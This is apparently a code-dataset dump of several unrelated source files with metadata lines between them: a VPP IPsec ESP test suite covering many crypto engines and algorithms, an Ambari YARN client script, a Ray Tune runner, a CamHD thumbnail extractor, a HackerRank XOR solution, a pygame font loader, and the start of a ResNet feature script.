                         IpsecTun4, IpsecTun6):
    """ Ipsec ESP all Algos """
    # Parameterised runner: subclasses encode their configuration in the
    # class docstring as "<engine> <ESN|noESN> <CRYPTO/INTEG> ..." which
    # is parsed in setUpConstants()/setUp() below.
    @classmethod
    def setUpConstants(cls):
        test_args = str.split(cls.__doc__, " ")
        engine = test_args[0]
        if engine == "async":
            # async crypto requires worker threads
            cls.vpp_worker_count = 2
        super(RunTestIpsecEspAll, cls).setUpConstants()
    def setUp(self):
        super(RunTestIpsecEspAll, self).setUp()
        # parse "<engine> <ESN|noESN> <algo>" from the subclass docstring
        test_args = str.split(self.__doc__, " ")
        params = MyParameters()
        self.engine = test_args[0]
        self.flag = params.flags[0]
        if test_args[1] == 'ESN':
            self.flag = params.flags[1]
        self.algo = params.algos[test_args[2]]
        self.async_mode = False
        if self.engine == "async":
            self.async_mode = True
    def tearDown(self):
        super(RunTestIpsecEspAll, self).tearDown()
    def run_test(self):
        self.run_a_test(self.engine, self.flag, self.algo)
    def run_a_test(self, engine, flag, algo, payload_size=None):
        # select the crypto engine (or the async path) under test
        if self.async_mode:
            self.vapi.cli("set ipsec async mode on")
        else:
            self.vapi.cli("set crypto handler all %s" % engine)
        self.logger.info(self.vapi.cli("show crypto async status"))
        # apply the algorithm/flag selection to both address families
        self.ipv4_params = IPsecIPv4Params()
        self.ipv6_params = IPsecIPv6Params()
        self.params = {self.ipv4_params.addr_type:
                       self.ipv4_params,
                       self.ipv6_params.addr_type:
                       self.ipv6_params}
        for _, p in self.params.items():
            p.auth_algo_vpp_id = algo['vpp-integ']
            p.crypt_algo_vpp_id = algo['vpp-crypto']
            p.crypt_algo = algo['scapy-crypto']
            p.auth_algo = algo['scapy-integ']
            p.crypt_key = algo['key']
            p.salt = algo['salt']
            p.flags = p.flags | flag
            p.outer_flow_label = 243224
            p.async_mode = self.async_mode
        self.reporter.send_keep_alive(self)
        #
        # configure the SPDs. SAs, etc
        #
        self.config_network(self.params.values())
        #
        # run some traffic.
        #  An exhaustive 4o6, 6o4 is not necessary
        #  for each algo
        #
        self.verify_tra_basic6(count=NUM_PKTS)
        self.verify_tra_basic4(count=NUM_PKTS)
        self.verify_tun_66(self.params[socket.AF_INET6],
                           count=NUM_PKTS)
        #
        # Use an odd-byte payload size to check for correct padding.
        #
        # 49 + 2 == 51 which should pad +1 to 52 for 4 byte alignment, +5
        # to 56 for 8 byte alignment, and +13 to 64 for 64 byte alignment.
        # This should catch bugs where the code is incorrectly over-padding
        # for algorithms that don't require it
        psz = 49 - len(IP()/ICMP()) if payload_size is None else payload_size
        self.verify_tun_44(self.params[socket.AF_INET],
                           count=NUM_PKTS, payload_size=psz)
        # payload sizes chosen to hit the buffer-chaining corner cases
        LARGE_PKT_SZ = [
            1970,  # results in 2 chained buffers entering decrypt node
                   # but leaving as simple buffer due to ICV removal (tra4)
            2004,  # footer+ICV will be added to 2nd buffer (tun4)
            4010,  # ICV ends up split across 2 buffers in esp_decrypt
                   # for transport4; transport6 takes normal path
            4020,  # same as above but tra4 and tra6 are switched
        ]
        if self.engine in engines_supporting_chain_bufs:
            for sz in LARGE_PKT_SZ:
                self.verify_tra_basic4(count=NUM_PKTS, payload_size=sz)
                self.verify_tra_basic6(count=NUM_PKTS, payload_size=sz)
                self.verify_tun_66(self.params[socket.AF_INET6],
                                   count=NUM_PKTS, payload_size=sz)
                self.verify_tun_44(self.params[socket.AF_INET],
                                   count=NUM_PKTS, payload_size=sz)
        #
        # swap the handlers while SAs are up
        #
        for e in engines:
            if e != engine:
                self.vapi.cli("set crypto handler all %s" % e)
                self.verify_tra_basic4(count=NUM_PKTS)
        #
        # remove the SPDs, SAs, etc
        #
        self.unconfig_network()
        #
        # reconfigure the network and SA to run the
        # anti replay tests
        #
        self.config_network(self.params.values())
        self.verify_tra_anti_replay()
        self.unconfig_network()
#
# To generate test classes, do:
# grep '# GEN' test_ipsec_esp.py | sed -e 's/# GEN //g' | bash
#
# GEN for ENG in native ipsecmb openssl; do \
# GEN for FLG in noESN ESN; do for ALG in AES-GCM-128/NONE \
# GEN AES-GCM-192/NONE AES-GCM-256/NONE AES-CBC-128/MD5-96 \
# GEN AES-CBC-192/SHA1-96 AES-CBC-256/SHA1-96 \
# GEN 3DES-CBC/SHA1-96 NONE/SHA1-96 \
# GEN AES-CTR-128/SHA1-96 AES-CTR-192/SHA1-96 AES-CTR-256/SHA1-96; do \
# GEN [[ ${FLG} == "ESN" && ${ALG} == *"NONE" ]] && continue
# GEN echo -e "\n\nclass Test_${ENG}_${FLG}_${ALG}(RunTestIpsecEspAll):" |
# GEN sed -e 's/-/_/g' -e 's#/#_#g' ; \
# GEN echo ' """'$ENG $FLG $ALG IPSec test'"""' ;
# GEN echo " def test_ipsec(self):";
# GEN echo " self.run_test()";
# GEN done; done; done
#
# GEN for FLG in noESN ESN; do for ALG in \
# GEN AES-GCM-128/NONE AES-GCM-192/NONE AES-GCM-256/NONE \
# GEN AES-CBC-192/SHA1-96 AES-CBC-256/SHA1-96; do \
# GEN [[ ${FLG} == "ESN" && ${ALG} == *"NONE" ]] && continue
# GEN echo -e "\n\nclass Test_async_${FLG}_${ALG}(RunTestIpsecEspAll):" |
# GEN sed -e 's/-/_/g' -e 's#/#_#g' ; \
# GEN echo ' """'async $FLG $ALG IPSec test'"""' ;
# GEN echo " def test_ipsec(self):";
# GEN echo " self.run_test()";
# GEN done; done;
# ----------------------------------------------------------------------
# Auto-generated test classes — one per (engine, ESN flag, algorithm)
# combination.  The class docstring is parsed by RunTestIpsecEspAll to
# select the configuration.  Do not edit these by hand: regenerate them
# with the GEN shell recipe in the comment block above.
# ----------------------------------------------------------------------
class Test_native_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
    """native noESN AES-GCM-128/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
    """native noESN AES-GCM-192/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
    """native noESN AES-GCM-256/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
    """native noESN AES-CBC-128/MD5-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """native noESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """native noESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
    """native noESN 3DES-CBC/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_NONE_SHA1_96(RunTestIpsecEspAll):
    """native noESN NONE/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
    """native noESN AES-CTR-128/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
    """native noESN AES-CTR-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_noESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
    """native noESN AES-CTR-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
    """native ESN AES-CBC-128/MD5-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """native ESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """native ESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
    """native ESN 3DES-CBC/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_NONE_SHA1_96(RunTestIpsecEspAll):
    """native ESN NONE/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
    """native ESN AES-CTR-128/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
    """native ESN AES-CTR-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_native_ESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
    """native ESN AES-CTR-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
# -- ipsecmb engine ----------------------------------------------------
class Test_ipsecmb_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
    """ipsecmb noESN AES-GCM-128/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
    """ipsecmb noESN AES-GCM-192/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
    """ipsecmb noESN AES-GCM-256/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
    """ipsecmb noESN AES-CBC-128/MD5-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN 3DES-CBC/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_NONE_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN NONE/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN AES-CTR-128/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN AES-CTR-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_noESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb noESN AES-CTR-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
    """ipsecmb ESN AES-CBC-128/MD5-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN 3DES-CBC/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_NONE_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN NONE/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN AES-CTR-128/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN AES-CTR-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_ipsecmb_ESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
    """ipsecmb ESN AES-CTR-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
# -- openssl engine ----------------------------------------------------
class Test_openssl_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
    """openssl noESN AES-GCM-128/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
    """openssl noESN AES-GCM-192/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
    """openssl noESN AES-GCM-256/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
    """openssl noESN AES-CBC-128/MD5-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN 3DES-CBC/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_NONE_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN NONE/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN AES-CTR-128/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN AES-CTR-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_noESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
    """openssl noESN AES-CTR-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
    """openssl ESN AES-CBC-128/MD5-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN 3DES-CBC/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_NONE_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN NONE/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN AES-CTR-128/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN AES-CTR-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_openssl_ESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
    """openssl ESN AES-CTR-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
# -- async crypto path (subset of algorithms) --------------------------
class Test_async_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
    """async noESN AES-GCM-128/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_async_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
    """async noESN AES-GCM-192/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_async_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
    """async noESN AES-GCM-256/NONE IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_async_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """async noESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_async_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """async noESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_async_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
    """async ESN AES-CBC-192/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
class Test_async_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
    """async ESN AES-CBC-256/SHA1-96 IPSec test"""
    def test_ipsec(self):
        self.run_test()
| 37.350217
| 79
| 0.581018
|
acff59e249bf9c6eb6d2ae12aa479be93b467590
| 1,427
|
py
|
Python
|
stacks/XIAOMATECH/1.0/services/YARN/package/scripts/yarn_client.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 3
|
2019-08-13T01:44:16.000Z
|
2019-12-10T04:05:56.000Z
|
stacks/XIAOMATECH/1.0/services/YARN/package/scripts/yarn_client.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | null | null | null |
stacks/XIAOMATECH/1.0/services/YARN/package/scripts/yarn_client.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 7
|
2019-05-29T17:35:25.000Z
|
2021-12-04T07:55:10.000Z
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ambari Agent
"""
import sys
from resource_management.libraries.script.script import Script
from resource_management.core.exceptions import ClientComponentHasNoStatus
from yarn import yarn, install_yarn
class YarnClient(Script):
    # Ambari handler for the YARN client component: installs the client
    # packages and writes the client configuration.  Clients have no
    # daemon, hence no status.
    def install(self, env):
        self.install_packages(env)
        install_yarn()
        self.configure(env)
    def configure(self, env):
        import params
        env.set_params(params)
        yarn()
    def status(self, env):
        # client components have no running process to report on
        raise ClientComponentHasNoStatus()
    def pre_upgrade_restart(self, env):
        # no client-specific upgrade steps; just refresh the parameters
        import params
        env.set_params(params)
if __name__ == "__main__":
    # entry point: the Script framework dispatches the requested command
    YarnClient().execute()
| 29.122449
| 74
| 0.747722
|
acff5a264e2e9a300bd7ddde1ac45f942047b936
| 2,977
|
py
|
Python
|
python/ray/tune/tune.py
|
rickyHong/Ray-repl
|
24b93b11231fe627c4b4527535ae0c83a99485f8
|
[
"Apache-2.0"
] | 1
|
2020-06-25T18:17:10.000Z
|
2020-06-25T18:17:10.000Z
|
python/ray/tune/tune.py
|
rickyHong/Ray-Population-Based-Training-repl
|
195a42f2fa4ab39d1e2260e6860d88c529023655
|
[
"Apache-2.0"
] | null | null | null |
python/ray/tune/tune.py
|
rickyHong/Ray-Population-Based-Training-repl
|
195a42f2fa4ab39d1e2260e6860d88c529023655
|
[
"Apache-2.0"
] | 1
|
2021-09-22T14:46:19.000Z
|
2021-09-22T14:46:19.000Z
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import sys
import ray
from ray.tune import TuneError
from ray.tune.hyperband import HyperBandScheduler
from ray.tune.median_stopping_rule import MedianStoppingRule
from ray.tune.trial import Trial
from ray.tune.trial_runner import TrialRunner
from ray.tune.trial_scheduler import FIFOScheduler
from ray.tune.variant_generator import generate_trials
EXAMPLE_USAGE = """
MNIST tuning example:
./tune.py -f examples/tune_mnist_ray.yaml
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Tune hyperparameters with Ray.",
epilog=EXAMPLE_USAGE)
# See also the base parser definition in ray/tune/config_parser.py
parser.add_argument("--redis-address", default=None, type=str,
help="The Redis address of the cluster.")
parser.add_argument("--num-cpus", default=None, type=int,
help="Number of CPUs to allocate to Ray.")
parser.add_argument("--num-gpus", default=None, type=int,
help="Number of GPUs to allocate to Ray.")
parser.add_argument("--scheduler", default="FIFO", type=str,
help="FIFO, MedianStopping, or HyperBand")
parser.add_argument("--scheduler-config", default="{}", type=json.loads,
help="Config options to pass to the scheduler.")
parser.add_argument("-f", "--config-file", required=True, type=str,
help="Read experiment options from this JSON/YAML file.")
_SCHEDULERS = {
"FIFO": FIFOScheduler,
"MedianStopping": MedianStoppingRule,
"HyperBand": HyperBandScheduler,
}
def _make_scheduler(args):
if args.scheduler in _SCHEDULERS:
return _SCHEDULERS[args.scheduler](**args.scheduler_config)
else:
raise TuneError(
"Unknown scheduler: {}, should be one of {}".format(
args.scheduler, _SCHEDULERS.keys()))
def run_experiments(experiments, scheduler=None, **ray_args):
if scheduler is None:
scheduler = FIFOScheduler()
runner = TrialRunner(scheduler)
for name, spec in experiments.items():
for trial in generate_trials(spec, name):
runner.add_trial(trial)
print(runner.debug_string())
ray.init(**ray_args)
while not runner.is_finished():
runner.step()
print(runner.debug_string())
for trial in runner.get_trials():
if trial.status != Trial.TERMINATED:
raise TuneError("Trial did not complete", trial)
return runner.get_trials()
if __name__ == "__main__":
import yaml
args = parser.parse_args(sys.argv[1:])
with open(args.config_file) as f:
experiments = yaml.load(f)
run_experiments(
experiments, _make_scheduler(args), redis_address=args.redis_address,
num_cpus=args.num_cpus, num_gpus=args.num_gpus)
| 31.336842
| 77
| 0.696003
|
acff5b737dcbc3f48c0ae5a60732477f3a067c10
| 3,099
|
py
|
Python
|
python/apps/extract_static_thumbnails.py
|
CamHD-Analysis/camhd_motion_analysis
|
41c38b9de4459e658a3358596e7995aa01f660e7
|
[
"MIT"
] | 1
|
2021-01-20T13:45:50.000Z
|
2021-01-20T13:45:50.000Z
|
python/apps/extract_static_thumbnails.py
|
CamHD-Analysis/camhd_motion_analysis
|
41c38b9de4459e658a3358596e7995aa01f660e7
|
[
"MIT"
] | 5
|
2018-07-17T19:07:32.000Z
|
2018-07-19T19:53:42.000Z
|
python/apps/extract_static_thumbnails.py
|
CamHD-Analysis/camhd_motion_analysis
|
41c38b9de4459e658a3358596e7995aa01f660e7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import json
import logging
import argparse
import glob
import pandas as pd
import numpy as np
import os
import os.path as path
from scipy import misc
import camhd_motion_analysis as ma
import pycamhd.lazycache as camhd
parser = argparse.ArgumentParser(description='')
parser.add_argument('input', metavar='N', nargs='+',
help='*_optical_flow_regions.json file to analyze')
# parser.add_argument('--base-dir', dest='basedir', metavar='o', nargs='?',
# help='Base directory')
parser.add_argument('--output-dir', dest='outdir', metavar='o', nargs='?', default=".",
help='File for output')
parser.add_argument('--log', metavar='log', nargs='?', default='INFO',
help='Logging level')
parser.add_argument('--force', dest='force', action='store_true', help='Force overwrite')
parser.add_argument('--lazycache-url', dest='lazycache', default=os.environ.get("LAZYCACHE_URL", "http://camhd-app-dev-nocache.appspot.com/v1/org/oceanobservatories/rawdata/files"),
help='URL to Lazycache repo server')
args = parser.parse_args()
logging.basicConfig( level=args.log.upper() )
qt = camhd.lazycache( args.lazycache )
for input_path in args.input:
for infile in glob.iglob( input_path, recursive=True ):
logging.info( "Processing %s" % infile)
regions_json = ma.load_regions( infile )
mov_path = regions_json['movie']['URL']
classification_file = args.outdir + path.splitext(mov_path)[0] + "_classify.json"
if path.exists( classification_file ):
with open(classification_file) as f:
classification = json.load( f )
else:
classification = {}
regions = pd.DataFrame( regions_json["regions"] ).drop('stats',1)
static = regions[ regions.type == "static"]
min_length = 30
static["length"] = static.endFrame - static.startFrame
static = static.loc[ static.length >= min_length ]
for idx,r in static.iterrows():
logging.info(" Processing region from %d to %d" % (r.startFrame, r.endFrame) )
samples = 5
frames = range( r.startFrame, r.endFrame, round(r.length / (samples+1)) )
frames = frames[1:-1]
for f in frames:
base_path = path.splitext(mov_path)[0] + ("/frame_%08d.png" % f)
image_path = args.outdir + base_path
print(image_path)
if path.exists( image_path ) and not args.force:
logging.warning("Image %s already exists, not remaking" % image_path )
continue;
image = qt.get_frame( mov_path, f, timeout=30 )
os.makedirs( path.dirname(image_path), exist_ok=True )
misc.imsave( image_path, image )
if base_path not in classification:
classification[base_path] = "unknown"
with open( classification_file, 'w') as f:
json.dump(classification, f, indent=2)
| 32.28125
| 181
| 0.612778
|
acff5b7ce109502d31adac57d613afbee54fcdb8
| 655
|
py
|
Python
|
algorithms/bit-manipulation/maximizing-xor.py
|
PingHuskar/hackerrank
|
1bfdbc63de5d0f94cd9e6ae250476b4a267662f2
|
[
"Unlicense"
] | 41
|
2018-05-11T07:54:34.000Z
|
2022-03-29T19:02:32.000Z
|
algorithms/bit-manipulation/maximizing-xor.py
|
PingHuskar/hackerrank
|
1bfdbc63de5d0f94cd9e6ae250476b4a267662f2
|
[
"Unlicense"
] | 2
|
2021-09-13T10:03:26.000Z
|
2021-10-04T10:21:05.000Z
|
algorithms/bit-manipulation/maximizing-xor.py
|
PingHuskar/hackerrank
|
1bfdbc63de5d0f94cd9e6ae250476b4a267662f2
|
[
"Unlicense"
] | 21
|
2019-01-23T19:06:59.000Z
|
2021-12-23T16:03:47.000Z
|
# Algorithms > Bit Manipulation > Maximizing XOR
# Given two integers, L and R, find the maximal value of A xor B,
# where A and B satisfy a condition.
#
# https://www.hackerrank.com/challenges/maximizing-xor/problem
#
# L = 00000101......
# R = 00000111......
# L^R = 00000010......
# sol = 0000001111...1 on met des 1 après le bit le plus à gauche de L^R
def maximizingXor(l, r):
# Complete this function
r = l ^ r
m = 0
while r != 0:
r //= 2
m = m * 2 + 1
return m
if __name__ == "__main__":
l = int(input().strip())
r = int(input().strip())
result = maximizingXor(l, r)
print(result)
| 21.833333
| 77
| 0.583206
|
acff5c5843646246876c24f0dd8b20bf5e63b9ec
| 1,238
|
py
|
Python
|
src/fonts.py
|
samuelwestlake/ImageLabel
|
f80bc9fdb85e0c0171cd18049acd66a5887417eb
|
[
"MIT"
] | null | null | null |
src/fonts.py
|
samuelwestlake/ImageLabel
|
f80bc9fdb85e0c0171cd18049acd66a5887417eb
|
[
"MIT"
] | null | null | null |
src/fonts.py
|
samuelwestlake/ImageLabel
|
f80bc9fdb85e0c0171cd18049acd66a5887417eb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import pygame
def lato(size, style=None):
path = "../fonts/Lato/"
if style == "black":
return pygame.font.Font(path + "Lato-Black.ttf", int(size))
elif style == "black_italic":
return pygame.font.Font(path + "Lato-BlackItalic.ttf", int(size))
elif style == "bold":
return pygame.font.Font(path + "Lato-Bold.ttf", int(size))
elif style == "bold_italic":
return pygame.font.Font(path + "Lato-BoldItalic.ttf", int(size))
elif style == "hairline":
return pygame.font.Font(path + "Lato-Hairline.ttf", int(size))
elif style == "hairline_italic":
return pygame.font.Font(path + "Lato-HairlineItalic.ttf", int(size))
elif style == "italic":
return pygame.font.Font(path + "Lato-Italic.ttf", int(size))
elif style == "light":
return pygame.font.Font(path + "Lato-Light.ttf", int(size))
elif style == "light_italic":
return pygame.font.Font(path + "Lato-LightItalic.ttf", int(size))
else:
return pygame.font.Font(path + "Lato-Regular.ttf", int(size))
def lit_sans_medium(size, style=None):
path = "../fonts/LitSans-Medium/"
return pygame.font.Font(path + "LitSans-Medium.otf", int(size))
| 37.515152
| 76
| 0.632472
|
acff5cb695ea0a88996ce4ceeecd75090fe7e99a
| 10,360
|
py
|
Python
|
scripts/precompute_resnet_img_features.py
|
ayshrv/visitron
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
[
"MIT-0"
] | 5
|
2021-05-27T14:23:07.000Z
|
2021-10-30T14:38:24.000Z
|
scripts/precompute_resnet_img_features.py
|
ayshrv/visitron
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
[
"MIT-0"
] | 1
|
2022-02-08T19:04:03.000Z
|
2022-02-08T19:04:03.000Z
|
scripts/precompute_resnet_img_features.py
|
ayshrv/visitron
|
2f30e6c002ed021d2be209a94a5e77c2d7e2117f
|
[
"MIT-0"
] | 3
|
2020-10-07T22:56:50.000Z
|
2021-10-30T14:38:19.000Z
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import argparse
import base64
import csv
import json
import math
import os
import random
import sys
from multiprocessing import Pool
import cv2
import MatterSim
import numpy as np
import torch
import torch.nn as nn
import torchvision
import torchvision.models
import torchvision.transforms.functional as F
from PIL import Image
from timer import Timer
# sys.path.insert(0, "/root/mount/Matterport3DSimulator/models/")
# import bit_pytorch.models as bit_models
csv.field_size_limit(sys.maxsize)
parser = argparse.ArgumentParser()
